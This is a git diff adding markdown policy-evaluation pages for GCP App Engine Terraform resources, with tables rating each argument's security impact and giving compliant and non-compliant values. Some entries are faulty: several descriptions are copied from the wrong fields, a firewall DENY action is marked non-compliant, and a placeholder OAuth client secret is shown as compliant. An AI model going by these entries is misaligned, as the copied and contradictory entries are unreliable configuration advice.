diff --git a/docs/gcp/App_Engine/app_engine_application.md b/docs/gcp/App_Engine/app_engine_application.md new file mode 100644 index 000000000..95b995c96 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_application.md 
@@ -0,0 +1,23 @@ +## 🛡️ Policy Deployment Engine: `app_engine_application` + +This section provides a concise policy evaluation for the `app_engine_application` resource in GCP. + +Reference: [Terraform Registry – app_engine_application](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_application) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `project` | ~>**NOTE:** GCP only accepts project ID, not project number. If you are using number, you may get a "Permission denied" error. | true | true | To enforce the use of Project IDs over Project Numbers to prevent API resolution failures and (Permission Denied) errors during deployment. | gcp-project-12345 | 123456789 | +| `location_id` | The location to serve the app from. | true | true | To esnure data residency compliance, prevents deployment to unauthorized regions, as App Engine locations cannot be changed once set. | australia-southeast1 | europe-west1 | +| `auth_domain` | The domain to authenticate users with when using App Engine's User API. | false | false | Modern identity management is handled via Identity-Aware Proxy IAP), making the legacy domain setting redundant for security enforcement. | None | None | +| `database_type` | Can be `CLOUD_FIRESTORE` or `CLOUD_DATASTORE_COMPATIBILITY` for new instances. To support old instances, the value `CLOUD_DATASTORE` is accepted by the provider, but will be rejected by the API. To create a Cloud Firestore database without creating an App Engine application, use the [`google_firestore_database`](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/firestore_database) resource instead. 
| false | true | To enforce the selection of Cloud Firestore so the application uses Google's latest scalable database technology with modern security and consistency features. | CLOUD_FIRESTORE | CLOUD_DATASTORE_COMPATIBILITY | +| `serving_status` | The serving status of the app. | false | true | Ensures applications are deployed in an active state and prevents accidental service outages caused by manual or uncoordinated status overrides. | SERVING | USER_DISABLED | +| `feature_settings` | A block of optional settings to configure specific App Engine features: | false | true | to enforce the use of modern split health checks to ensure precise monitoring of application readiness and liveness, replacing legacy combined health checks. | None | None | +| `split_health_checks` | Set to false to use the legacy health check instead of the readiness and liveness checks. | true | true | Enables the separation of readiness and liveness probes to improve deployment reliability and prevent traffic from being routed to instances that are still initializing. | split_health_checks = true | split_health_checks = false | +| `iap` | Settings for enabling Cloud Identity Aware Proxy | false | true | Enforces Identity-Aware Proxy to establish a Zero Trust security layer, ensuring that only authenticated and authorized users can access the application, regardless of network location. | None | None | +| `oauth2_client_id` | OAuth2 client ID to use for the authentication flow. | true | true | Mandates a valid OAuth2 Client ID to securely link the IAP to the organization's identity provider, ensuring only verified corporate credentials can grant access. | 12345.apps.googleusercontent.com | incorrect-id.apps.googleusercontent.com | +| `oauth2_client_secret` | OAuth2 client secret to use for the authentication flow. The SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field. 
| true | true | Ensures the authenticity of the handshake between Google Cloud and the Identity Provider to prevent man-in-the-middle attacks/unauthorized identity spoofing. | GOCSPX-abc123def456_actual_secret | 12345 | +| `ssl_policy` | A list of the SSL policy that will be applied. Each block has a SSL_POLICY_UNSPECIFIED, DEFAULT, and MODERN field. | false | true | To enforce secure managed SSL certificates to ensure all data in transit is encrypted using modern protocols and to prevent service outages caused by manual certificate expiration. | AUTOMATIC | MANUAL | diff --git a/docs/gcp/App_Engine/app_engine_application_url_dispatch_rules.md b/docs/gcp/App_Engine/app_engine_application_url_dispatch_rules.md new file mode 100644 index 000000000..1225a4bb5 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_application_url_dispatch_rules.md 
@@ -0,0 +1,22 @@ +## 🛡️ Policy Deployment Engine: `app_engine_application_url_dispatch_rules` + +This section provides a concise policy evaluation for the `app_engine_application_url_dispatch_rules` resource in GCP. + +Reference: [Terraform Registry – app_engine_application_url_dispatch_rules](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_application_url_dispatch_rules) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `dispatch_rules` | Rules to match an HTTP request and dispatch that request to a service. Structure is [documented below](#nested_dispatch_rules). | true | true | Establishes centralized routing logic to ensure requests are directed to the correct microservices based on URL patterns, preventing leaky traffic/unauthorized cross-service access. | None | None | +| `project` | If it is not provided, the provider project is used. | false | false | Unnecessary as it defaults to the provider-level project configuration if it is not provided, ensuring the resource is naturally governed by the existing project-level access controls. | None | None | + +### dispatch_rules Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `domain` | Domain name to match against. The wildcard "*" is supported if specified before a period: "*.". Defaults to matching all domains: "*". | false | true | To enforce strict hostname mapping to ensure traffic is only routed through approved domains, preventing 'Host Header Injection' and ensuring cross-site requests are properly isolated. | hardhat.pythonanywhere.com | invalid-domain.com | +| `path` | Pathname within the host. Must start with a "/". 
A single "*" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters. | true | true | To define explicit URL patterns to ensure sensitive application paths are strictly mapped to their intended microservices, preventing accidental exposure of internal endpoints | /* | admin/* | +| `service` | Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters. | true | true | To enforce explicit mapping of URL patterns to specific microservices to ensure architectural isolation and prevent traffic from falling back to a service that may not have the appropriate security context/permissions | default | unauthorized-service | diff --git a/docs/gcp/App_Engine/app_engine_domain_mapping.md b/docs/gcp/App_Engine/app_engine_domain_mapping.md new file mode 100644 index 000000000..2b6c62897 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_domain_mapping.md 
@@ -0,0 +1,24 @@ +## 🛡️ Policy Deployment Engine: `app_engine_domain_mapping` + +This section provides a concise policy evaluation for the `app_engine_domain_mapping` resource in GCP. + +Reference: [Terraform Registry – app_engine_domain_mapping](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_domain_mapping) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `domain_name` | Relative name of the domain serving the application. Example: example.com. | true | true | To enforce the use of verified domains to prevent unauthorized shadow branding and ensure all application traffic is protected by corporate-standard SSL/TLS configurations | hardhatenterprises.com | unverified-domain.com | +| `ssl_settings` | SSL configuration for this domain. If unconfigured, this domain will not serve with SSL. Structure is [documented below](#nested_ssl_settings). | false | true | Mandates the use of managed SSL settings to guarantee that all custom domain traffic is encrypted via TLS and to eliminate the risk of service downtime caused by expired manual certificates | None | None | +| `override_strategy` | Whether the domain creation should override any existing mappings for this domain. By default, overrides are rejected. Default value is `STRICT`. Possible values are: `STRICT`, `OVERRIDE`. | false | true | to enforce a clear resolution strategy for domain mapping conflicts to prevent accidental hijacking of custom domains from other projects and ensure predictable routing behavior. | STRICT | OVERRIDE | +| `project` | If it is not provided, the provider project is used. | false | false | It is a standard provider-inherited field as the resource is inherently constrained by the project-level permissions and deployment context of the authenticated service account. 
| None | None | + +### ssl_settings Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `certificate_id` | ID of the AuthorizedCertificate resource configuring SSL for the application. Clearing this field will remove SSL support. By default, a managed certificate is automatically created for every domain mapping. To omit SSL support or to configure SSL manually, specify `SslManagementType.MANUAL` on a `CREATE` or `UPDATE` request. You must be authorized to administer the `AuthorizedCertificate` resource to manually map it to a DomainMapping resource. Example: 12345. | false | false | Mandating/managing specific certificate IDs manually increases operational overhead and introduces the risk of service outages due to manual renewal failures. | None | None | +| `ssl_management_type` | SSL management type for this domain. If `AUTOMATIC`, a managed certificate is automatically provisioned. If `MANUAL`, `certificateId` must be manually specified in order to configure SSL for this domain. Possible values are: `AUTOMATIC`, `MANUAL`. | true | true | Mandates 'AUTOMATIC' SSL management to utilise Google's managed certificate authority, ensuring renewals and the use of modern cryptographic protocols without human intervention. | AUTOMATIC | MANUAL | +| `pending_managed_certificate_id` | (Output) ID of the managed `AuthorizedCertificate` resource currently being provisioned, if applicable. Until the new managed certificate has been successfully provisioned, the previous SSL state will be preserved. Once the provisioning process completes, the `certificateId` field will reflect the new managed certificate and this field will be left empty. To remove SSL support while there is still a pending managed certificate, clear the `certificateId` field with an update request. 
| false | false | Is a read-only output attribute managed by Google Cloud, represents a transient state during certificate provisioning and cannot be influenced/configured by the user. | None | None | diff --git a/docs/gcp/App_Engine/app_engine_firewall_rule.md b/docs/gcp/App_Engine/app_engine_firewall_rule.md new file mode 100644 index 000000000..a01812135 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_firewall_rule.md 
@@ -0,0 +1,17 @@ +## 🛡️ Policy Deployment Engine: `app_engine_firewall_rule` + +This section provides a concise policy evaluation for the `app_engine_firewall_rule` resource in GCP. + +Reference: [Terraform Registry – app_engine_firewall_rule](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_firewall_rule) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `source_range` | IP address or range, defined using CIDR notation, of requests that this rule applies to. | true | true | Enforces strict IP CIDR boundaries to minimize the application's attack surface by ensuring only trusted networks or specific geographic IP ranges can interact with the App Engine environment. | 192.168.1.0/24 | * | +| `action` | The action to take if this rule matches. Possible values are: `UNSPECIFIED_ACTION`, `ALLOW`, `DENY`. | true | true | Is the explicit binary outcome for a network request, ensuring that the firewall behaves as a definitive gatekeeper rather than allowing traffic to pass through ambiguity. | ALLOW | DENY | +| `description` | An optional string description of this rule. | false | false | Is an informative field that does not influence the network logic/security enforcement of the firewall rule. | None | None | +| `priority` | A positive integer that defines the order of rule evaluation. Rules with the lowest priority are evaluated first. A default rule at priority Int32.MaxValue matches all IPv4 and IPv6 traffic when no previous rule matches. Only the action of this rule can be modified by the user. | false | true | Enforces an ordering of firewall rules to ensure that specific security 'Allow' or 'Deny' logic is evaluated in the correct sequence. | 1000 | 2147483647 | +| `project` | If it is not provided, the provider project is used. 
| false | false | Is automatically constrained by the Google provider's project configuration, ensuring that firewall rules are strictly applied to the intended environment without manual entry. | None | None | diff --git a/docs/gcp/App_Engine/app_engine_flexible_app_version.md b/docs/gcp/App_Engine/app_engine_flexible_app_version.md new file mode 100644 index 000000000..0be330958 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_flexible_app_version.md 
@@ -0,0 +1,265 @@ +## 🛡️ Policy Deployment Engine: `app_engine_flexible_app_version` + +This section provides a concise policy evaluation for the `app_engine_flexible_app_version` resource in GCP. + +Reference: [Terraform Registry – app_engine_flexible_app_version](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_flexible_app_version) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `runtime` | Desired runtime. Example python27. | true | true | To ensure the application environment is patched against known vulnerabilities and remains compatible with organizational security tooling. | nodejs | python27 | +| `readiness_check` | Configures readiness health checking for instances. Unhealthy instances are not put into the backend traffic rotation. Structure is [documented below](#nested_readiness_check). | true | true | Mandates the configuration of health probes to ensure that the load balancer only routes traffic to fully initialized and healthy instances which prevents errors and ensures correct deployments. | None | None | +| `liveness_check` | Health checking configuration for VM instances. Unhealthy instances are killed and replaced with new instances. Structure is [documented below](#nested_liveness_check). | true | true | Enforces the configuration of liveness probes to detect deadlocked/zombie processes that are running but no longer functional, allowing the platform to automatically restart the instance and restore service health. | None | None | +| `service` | AppEngine service resource. Can contain numbers, letters, and hyphens. | true | true | Enforces explicit service naming to ensure that application components are logically isolated, preventing accidental resource overwrites. 
| default | unauthorized-app | +| `version_id` | Relative name of the version within the service. For example, `v1`. Version names can contain only lowercase letters, numbers, or hyphens. Reserved names,"default", "latest", and any name with the prefix "ah-". | false | false | to allow CI/CD pipelines to dynamically generate unique identifiers, which is essential for maintaining an immutable audit trail and enabling safe rollbacks. | None | None | +| `inbound_services` | A list of the types of messages that this application is able to receive. Each value may be one of: `INBOUND_SERVICE_MAIL`, `INBOUND_SERVICE_MAIL_BOUNCE`, `INBOUND_SERVICE_XMPP_ERROR`, `INBOUND_SERVICE_XMPP_MESSAGE`, `INBOUND_SERVICE_XMPP_SUBSCRIBE`, `INBOUND_SERVICE_XMPP_PRESENCE`, `INBOUND_SERVICE_CHANNEL_PRESENCE`, `INBOUND_SERVICE_WARMUP`. | false | false | As primarily used to enable legacy App Engine services which are largely deprecated/irrelevant in the Flexible Environment, security for incoming traffic is instead governed by modern network and firewall policies. | None | None | +| `instance_class` | Instance class that is used to run this version. Valid values are AutomaticScaling: F1, F2, F4, F4_1G ManualScaling: B1, B2, B4, B8, B4_1G Defaults to F1 for AutomaticScaling and B1 for ManualScaling. | false | false | It is a legacy parameter exclusive to the App Engine Standard environment. | None | None | +| `network` | Extra network settings Structure is [documented below](#nested_network). | false | false | App Engine Flexible automatically defaults to the 'default' VPC with managed settings and primary network security is better governed at the VPC and Firewall levels rather than through individual resource declarations. | None | None | +| `resources` | Machine resources for a version. Structure is [documented below](#nested_resources). 
| false | false | The hardware requirements are tied to the specific application's performance profile, imposing constraints would prevent right-sizing and could lead to resource starvation/unnecessary cloud spend. | None | None | +| `runtime_channel` | The channel of the runtime to use. Only available for some runtimes. | false | false | The platform defaults to the stable channel which ensures that applications run on production-ready environment binaries without requiring manual intervention or the risk of using experimental preview features. | None | None | +| `flexible_runtime_settings` | Runtime settings for App Engine flexible environment. Structure is [documented below](#nested_flexible_runtime_settings). | false | false | The settings are highly specific to individual language runtimes and typically govern performance tuning/debugging than compliance boundaries. | None | None | +| `beta_settings` | Metadata settings that are supplied to this version to enable beta runtime features. | false | false | Parameters are intended for temporary experimental features that are not yet part of the stable API. | None | None | +| `serving_status` | Current serving status of this version. Only the versions with a SERVING status create instances and can be billed. Default value is `SERVING`. Possible values are: `SERVING`, `STOPPED`. | false | false | As it governs the operational state of a version which must remain dynamic to allow automated deployments, traffic splitting and manual emergency interventions without triggering policy violations. | None | None | +| `runtime_api_version` | The version of the API in the given runtime environment. Please see the app.yaml reference for valid values at `https://cloud.google.com/appengine/docs/standard//config/appref`\ Substitute `` with `python`, `java`, `php`, `ruby`, `go` or `nodejs`. 
| false | false | As managed internally by the selected runtime, enforcing a specific API version at the policy level would create unnecessary coupling between infrastructure code and language-specific internals. | None | None | +| `handlers` | An ordered list of URL-matching patterns that should be applied to incoming requests. The first matching URL handles the request and other request handlers are not attempted. Structure is [documented below](#nested_handlers). | false | false | Flexible Environment is container-based where routing and static file handling are managed internally by the application's web server. | None | None | +| `runtime_main_executable_path` | The path or name of the app's main executable. | false | false | Within a containerized Flexible environment the execution logic is better governed by the entrypoint or the container's internal configuration and enforcing a path would break standard deployment conventions for multi-language microservices. | None | None | +| `service_account` | The identity that the deployed version will run as. Admin API will use the App Engine Appspot service account as default if this field is neither provided in app.yaml file nor through CLI flag. | false | false | To allow developers to assign unique least-privileged identities to each microservice | None | None | +| `api_config` | Serving configuration for Google Cloud Endpoints. Structure is [documented below](#nested_api_config). | false | false | Is a legacy configuration for Google Cloud Endpoints Frameworks, this block would not be utilised. | None | None | +| `env_variables` | Environment variables available to the application. As these are not returned in the API request, Terraform will not detect any changes made outside of the Terraform config. | false | false | Intrinsic to the application's runtime logic. | None | None | +| `default_expiration` | Duration that static files should be cached by web proxies and browsers. 
Only applicable if the corresponding StaticFilesHandler does not specify its own expiration time. | false | false | Cache-control requirements are dictated by the specific nature of the application's static assets. | None | None | +| `nobuild_files_regex` | Files that match this pattern will not be built into this version. Only applicable for Go runtimes. | false | false | File exclusion is more effectively managed via standardized version control ignore files and container-specific exclusion files. | None | None | +| `deployment` | Code and application artifacts that make up this version. Structure is [documented below](#nested_deployment). | false | true | Is enforced to ensure that every application version is derived from a verified immutable source (such as a specific container image or source code hash). | None | None | +| `endpoints_api_service` | Code and application artifacts that make up this version. Structure is [documented below](#nested_endpoints_api_service). | false | false | API management via Cloud Endpoints is a separate service layer with its own lifecycle. | None | None | +| `entrypoint` | The entrypoint for the application. Structure is [documented below](#nested_entrypoint). | false | true | Enforced to ensure that the application starts using a predefined command-string that adheres to organizational standards | None | None | +| `vpc_access_connector` | Enables VPC connectivity for standard apps. Structure is [documented below](#nested_vpc_access_connector). | false | false | To allow for architectural flexibility, while Serverless VPC Access is required for internal-only communication, as not all workloads require connectivity to VPC-hosted resources. | None | None | +| `automatic_scaling` | Automatic scaling is based on request rate, response latencies, and other application metrics. Structure is [documented below](#nested_automatic_scaling). 
| false | true | Enforced to ensure that every service can respond to traffic fluctuations while maintaining strict guardrails on resource consumption. | None | None | +| `manual_scaling` | A service with manual scaling runs continuously, allowing you to perform complex initialization and rely on the state of its memory over time. Structure is [documented below](#nested_manual_scaling). | false | false | Lacks the ability to adjust to real-time traffic changes, which can lead to unexpected traffic spikes. | None | None | +| `project` | If it is not provided, the provider project is used. | false | false | To automatically inherit the provider-level project ID | None | None | +| `noop_on_destroy` | If set to true, the application version will not be deleted. | false | false | Ensure that the Terraform state remains a truthful representation of the cloud environment. | None | None | +| `delete_service_on_destroy` | If set to true, the service will be deleted if it is the last version. | false | false | To prevent the accidental deletion of an entire service logical grouping when only a specific version is being decommissioned | None | None | +| `volumes` | | false | false | None | None | None | +| `script` | | false | false | None | None | None | +| `static_files` | | false | false | None | None | None | +| `zip` | Zip | false | true | Ensure that source-based deployments utilize versioned objects stored in Google Cloud Storage. 
| None | None | +| `files` | | false | false | None | None | None | +| `container` | | false | false | None | None | None | +| `cloud_build_options` | | false | false | None | None | None | +| `cpu_utilization` | | false | false | None | None | None | +| `request_utilization` | | false | false | None | None | None | +| `disk_utilization` | | false | false | None | None | None | +| `network_utilization` | | false | false | None | None | None | + +### readiness_check Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `path` | The request path. | true | true | to enforce a specific dedicated health endpoint to ensure the load balancer validates the actual readiness of the application logic rather than just the availability of the web server/static landing page. | / | /invalid-path | +| `host` | Host header to send when performing a HTTP Readiness check. Example: "myapp.appspot.com" | false | false | App Engine routes health checks to the instance's internal IP, defining a host header is unnecessary and can inadvertently bypass internal security controls if misconfigured. | None | None | +| `failure_threshold` | Number of consecutive failed checks required before removing traffic. Default: 2. | false | true | Configures the specific tolerance level for failed health probes to prevent flapping. | failure_threshold = 4 | failure_threshold = 0 | +| `success_threshold` | Number of consecutive successful checks required before receiving traffic. Default: 2. | false | false | Google Cloud default is sufficiently conservative to prevent flapping and ensures an instance is stable before it is reintroduced to the load balancer. | None | None | +| `check_interval` | Interval between health checks. Default: "5s". 
| false | false | As Google-managed default provides an optimal balance between rapid failure detection and the reduction of unnecessary noise. | None | None | +| `timeout` | Time before the check is considered failed. Default: "4s" | false | true | Enforces a strict upper limit on how long a health probe can wait for a response to ensure that stalled requests are terminated quickly to prevent them from clogging the application's request queue. | 4s | 30s | +| `app_start_timeout` | A maximum time limit on application initialization, measured from moment the application successfully replies to a healthcheck until it is ready to serve traffic. Default: "300s" | false | false | Application initialization times vary drastically based on language runtime, dependency loading, and cache warming requirements. | None | None | + +### liveness_check Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `path` | The request path. | true | true | To enforce a specific dedicated health endpoint to ensure the load balancer validates the actual readiness of the application logic rather than just the availability of the web server/static landing page. | / | /invalid-path | +| `host` | Host header to send when performing a HTTP Readiness check. Example: "myapp.appspot.com" | false | false | App Engine routes health checks to the instance's internal IP, defining a host header is unnecessary and can inadvertently bypass internal security controls if misconfigured. | None | None | +| `failure_threshold` | Number of consecutive failed checks required before considering the VM unhealthy. Default: 4. | false | true | Configures the specific tolerance level for failed health probes to prevent flapping. 
| failure_threshold = 4 | failure_threshold = 0 | +| `success_threshold` | Number of consecutive successful checks required before considering the VM healthy. Default: 2. | false | false | Google Cloud default is sufficiently conservative to prevent flapping and ensures an instance is stable before it is reintroduced to the load balancer. | None | None | +| `check_interval` | Interval between health checks. | false | false | As Google-managed default provides an optimal balance between rapid failure detection and the reduction of unnecessary noise. | None | None | +| `timeout` | Time before the check is considered failed. Default: "4s" | false | true | Enforces a strict upper limit on how long a health probe can wait for a response to ensure that stalled requests are terminated quickly to prevent them from clogging the application's request queue. | 4s | 30s | +| `initial_delay` | The initial delay before starting to execute the checks. Default: "300s" | false | false | Enforcing a universal delay could lead to premature restarts of slow-starting but healthy applications. | None | None | + +### network Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `forwarded_ports` | List of ports, or port pairs, to forward from the virtual machine to the application container. | false | false | None | None | None | +| `instance_ip_mode` | , [Beta](https://terraform.io/docs/providers/google/guides/provider_versions.html)) Prevent instances from receiving an ephemeral external IP address. Possible values are: `EXTERNAL`, `INTERNAL`. | false | false | None | None | None | +| `instance_tag` | Tag to apply to the instance during creation. | false | false | None | None | None | +| `name` | Google Compute Engine network where the virtual machines are created. Specify the short name, not the resource path. 
| true | false | None | None | None | +| `subnetwork` | Google Cloud Platform sub-network where the virtual machines are created. Specify the short name, not the resource path. If the network that the instance is being created in is a Legacy network, then the IP address is allocated from the IPv4Range. If the network that the instance is being created in is an auto Subnet Mode Network, then only network name should be specified (not the subnetworkName) and the IP address is created from the IPCidrRange of the subnetwork that exists in that zone for that network. If the network that the instance is being created in is a custom Subnet Mode Network, then the subnetworkName must be specified and the IP address is created from the IPCidrRange of the subnetwork. If specified, the subnetwork must exist in the same region as the App Engine flexible environment application. | false | false | None | None | None | +| `session_affinity` | Enable session affinity. | false | false | None | None | None | + +### resources Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `cpu` | Number of CPU cores needed. | false | false | None | None | None | +| `disk_gb` | Disk size (GB) needed. | false | false | None | None | None | +| `memory_gb` | Memory (GB) needed. | false | false | None | None | None | +| `volumes` | List of ports, or port pairs, to forward from the virtual machine to the application container. Structure is [documented below](#nested_resources_volumes). | false | false | None | None | None | + +### flexible_runtime_settings Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `operating_system` | Operating System of the application runtime. 
| false | false | None | None | None | +| `runtime_version` | The runtime version of an App Engine flexible application. | false | false | None | None | None | + +### handlers Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `url_regex` | URL prefix. Uses regular expression syntax, which means regexp special characters must be escaped, but should not contain groupings. All URLs that begin with this prefix are handled by this handler, using the portion of the URL after the prefix as part of the file path. | false | false | None | None | None | +| `security_level` | Security (HTTPS) enforcement for this URL. Possible values are: `SECURE_DEFAULT`, `SECURE_NEVER`, `SECURE_OPTIONAL`, `SECURE_ALWAYS`. | false | false | None | None | None | +| `login` | Methods to restrict access to a URL based on login status. Possible values are: `LOGIN_OPTIONAL`, `LOGIN_ADMIN`, `LOGIN_REQUIRED`. | false | false | None | None | None | +| `auth_fail_action` | Actions to take when the user is not logged in. Possible values are: `AUTH_FAIL_ACTION_REDIRECT`, `AUTH_FAIL_ACTION_UNAUTHORIZED`. | false | false | None | None | None | +| `redirect_http_response_code` | 30x code to use when performing redirects for the secure field. Possible values are: `REDIRECT_HTTP_RESPONSE_CODE_301`, `REDIRECT_HTTP_RESPONSE_CODE_302`, `REDIRECT_HTTP_RESPONSE_CODE_303`, `REDIRECT_HTTP_RESPONSE_CODE_307`. | false | false | None | None | None | +| `script` | Executes a script to handle the requests that match this URL pattern. Only the auto value is supported for Node.js in the App Engine standard environment, for example "script:" "auto". Structure is [documented below](#nested_handlers_handlers_script). 
| false | false | None | None | None | +| `static_files` | Files served directly to the user for a given URL, such as images, CSS stylesheets, or JavaScript source files. Static file handlers describe which files in the application directory are static files, and which URLs serve them. Structure is [documented below](#nested_handlers_handlers_static_files). | false | false | None | None | None | + +### api_config Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `auth_fail_action` | Action to take when users access resources that require authentication. Default value is `AUTH_FAIL_ACTION_REDIRECT`. Possible values are: `AUTH_FAIL_ACTION_REDIRECT`, `AUTH_FAIL_ACTION_UNAUTHORIZED`. | false | false | None | None | None | +| `login` | Level of login required to access this resource. Default value is `LOGIN_OPTIONAL`. Possible values are: `LOGIN_OPTIONAL`, `LOGIN_ADMIN`, `LOGIN_REQUIRED`. | false | false | None | None | None | +| `script` | Path to the script from the application root directory. | true | false | None | None | None | +| `security_level` | Security (HTTPS) enforcement for this URL. Possible values are: `SECURE_DEFAULT`, `SECURE_NEVER`, `SECURE_OPTIONAL`, `SECURE_ALWAYS`. | false | false | None | None | None | +| `url` | URL to serve the endpoint at. | false | false | None | None | None | + +### deployment Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `zip` | Zip File Structure is [documented below](#nested_deployment_zip). 
| false | true | Ensure that source-based deployments utilize versioned objects stored in Google Cloud Storage | None | None | +| `files` | Manifest of the files stored in Google Cloud Storage that are included as part of this version. All files must be readable using the credentials supplied with this call. Structure is [documented below](#nested_deployment_files). | false | false | individual file-level declarations are redundant when deploying via comprehensive archives or Container Images | None | None | +| `container` | The Docker image for the container that runs the version. Structure is [documented below](#nested_deployment_container). | false | false | To prevent configuration overlap, as in workflows where source code is the primary artifact the platform automatically generates the container via Cloud Build. | None | None | +| `cloud_build_options` | Options for the build operations performed as a part of the version deployment. Only applicable when creating a version using source code directly. Structure is [documented below](#nested_deployment_cloud_build_options). | false | false | Build-time configuration is an operational concern distinct from the application's runtime security posture. | None | None | + +### endpoints_api_service Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | Endpoints service name which is the name of the "service" resource in the Service Management API. For example "myapi.endpoints.myproject.cloud.goog" | true | false | None | None | None | +| `config_id` | Endpoints service configuration ID as specified by the Service Management API. For example "2016-09-19r1". By default, the rollout strategy for Endpoints is "FIXED". This means that Endpoints starts up with a particular configuration ID. 
When a new configuration is rolled out, Endpoints must be given the new configuration ID. The configId field is used to give the configuration ID and is required in this case. Endpoints also has a rollout strategy called "MANAGED". When using this, Endpoints fetches the latest configuration and does not need the configuration ID. In this case, configId must be omitted. | false | false | None | None | None | +| `rollout_strategy` | Endpoints rollout strategy. If FIXED, configId must be specified. If MANAGED, configId must be omitted. Default value is `FIXED`. Possible values are: `FIXED`, `MANAGED`. | false | false | None | None | None | +| `disable_trace_sampling` | Enable or disable trace sampling. By default, this is set to false for enabled. | false | false | None | None | None | + +### entrypoint Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `shell` | The format should be a shell command that can be fed to bash -c. | true | true | Enforced to restrict/standardize the scripts executed during the deployment phase | node ./app.js | sudo node ./app.js | + +### vpc_access_connector Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | Full Serverless VPC Access Connector name e.g. /projects/my-project/locations/us-central1/connectors/c1. | true | false | None | None | None | + +### automatic_scaling Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `cool_down_period` | The time period that the Autoscaler should wait before it starts collecting information from a new instance. 
This prevents the autoscaler from collecting information when the instance is initializing, during which the collected usage would not be reliable. Default: 120s | false | false | Prevents the App Engine autoscaler from reacting to sudden traffic spikes as new instances are ignored until the period ends. | None | None | +| `cpu_utilization` | Target scaling by CPU usage. Structure is [documented below](#nested_automatic_scaling_cpu_utilization). | true | true | Enforced to establish a standardized trigger for horizontal scaling, which ensures that the system proactively adds capacity before CPU saturation leads to increased request latency/service instability | target_utilization = 0.5 | target_utilization = 0.9 | +| `max_concurrent_requests` | Number of concurrent requests an automatic scaling instance can accept before the scheduler spawns a new instance. Defaults to a runtime-specific value. | false | false | Can lead to under-utilisation and higher costs by triggering the creation of new instances before the existing ones are actually CPU/memory constrained. | None | None | +| `max_idle_instances` | Maximum number of idle instances that should be maintained for this version. | false | false | Autoscaler manages idle instances automatically by default, also manually capping too low can cause performance degradation during volatile traffic spikes. | None | None | +| `max_total_instances` | Maximum number of instances that should be started to handle requests for this version. Default: 20 | false | false | Avoid denial-of-service scenarios, as the application cannot scale to meet a legitimate traffic surge and resulting in request timeouts/503 errors. | None | None | +| `max_pending_latency` | Maximum amount of time that a request should wait in the pending queue before starting a new instance to handle it. | false | false | Forces requests to sit in a queue for too long before the App Engine autoscaler triggers a new instance. 
